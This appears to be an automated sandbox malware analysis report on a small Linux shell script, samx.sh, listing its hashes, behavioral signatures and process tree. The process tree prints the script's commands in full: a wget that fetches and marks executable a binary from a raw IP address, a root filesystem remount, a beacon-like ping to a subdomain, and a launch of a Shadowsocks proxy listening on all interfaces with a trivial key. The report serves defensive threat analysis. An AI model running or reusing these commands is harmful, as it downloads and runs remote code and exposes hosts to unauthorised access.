Analysis
-
max time kernel
1030s -
max time network
132s -
platform
debian-9_armhf -
resource
debian9-armhf-20221111-en -
resource tags
arch:armhfimage:debian9-armhf-20221111-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
23-11-2022 15:40
Static task
static1
Behavioral task
behavioral1
Sample
samx.sh
Resource
ubuntu1804-amd64-en-20211208
Behavioral task
behavioral2
Sample
samx.sh
Resource
debian9-armhf-20221111-en
Behavioral task
behavioral3
Sample
samx.sh
Resource
debian9-mipsbe-20221111-en
Behavioral task
behavioral4
Sample
samx.sh
Resource
debian9-mipsel-20221111-en
General
-
Target
samx.sh
-
Size
400B
-
MD5
6039cf7d6cc1378682e1a983fcaba7a8
-
SHA1
3ca4e29546ca125fd98429768ae0fd44182ccdee
-
SHA256
af2bc5dda7b0ae47a3ccd286afa17718b4e81daf944a8784e445e597dbbdcd28
-
SHA512
4119e1787b6edcc2639f0266308aea50891e67ea23404a060dd46bea082bc26033d8aafb93c06c084c391e141f838eacf21433cf94aabf1bf1e7b8e393504253
Malware Config
Signatures
-
Modifies hosts file 1 IoCs
Adds to hosts file used for mapping hosts to IP addresses.
Processes:
pingdescription ioc process /etc/hosts /etc/hosts ping -
Writes DNS configuration 1 TTPs 2 IoCs
Writes data to DNS resolver config file.
Processes:
pingss-serverdescription ioc process /etc/resolv.conf /etc/resolv.conf ping /etc/resolv.conf /etc/resolv.conf ss-server -
Reads runtime system information 3 IoCs
Reads data from /proc virtual filesystem.
Processes:
mountsedseddescription ioc process /proc/filesystems /proc/filesystems mount /proc/filesystems /proc/filesystems sed /proc/filesystems /proc/filesystems sed -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
Processes:
samx.shwgetdescription ioc process /tmp/samx.sh /tmp/samx.sh samx.sh /tmp/ss-server /tmp/ss-server wget
Processes
-
/tmp/samx.sh/tmp/samx.sh1⤵
- Writes file to tmp directory
PID:374 -
/bin/sleepsleep 1202⤵PID:375
-
/bin/mountmount -no "remount,rw" /2⤵
- Reads runtime system information
PID:402 -
/bin/pingping -c 4 samx-.subdomain.llzxs.com2⤵
- Modifies hosts file
- Writes DNS configuration
PID:410 -
/usr/bin/wgetwget -P /tmp/ http://185.135.73.148:800/ss-server2⤵
- Writes file to tmp directory
PID:411 -
/bin/sleepsleep 102⤵PID:445
-
/bin/chmodchmod +x /tmp/ss-server2⤵PID:515
-
/bin/sedsed "s/ /-/g"1⤵
- Reads runtime system information
PID:405
-
/bin/grepgrep "inet addr"1⤵PID:408
-
/bin/sedsed -r "s/ +inet addr:([0-9.]+) .+/\\1/g"1⤵
- Reads runtime system information
PID:409
-
/tmp/ss-server/tmp/ss-server -s 0.0.0.0 -p 8300 -m aes-256-cfb -k 1234561⤵
- Writes DNS configuration
PID:517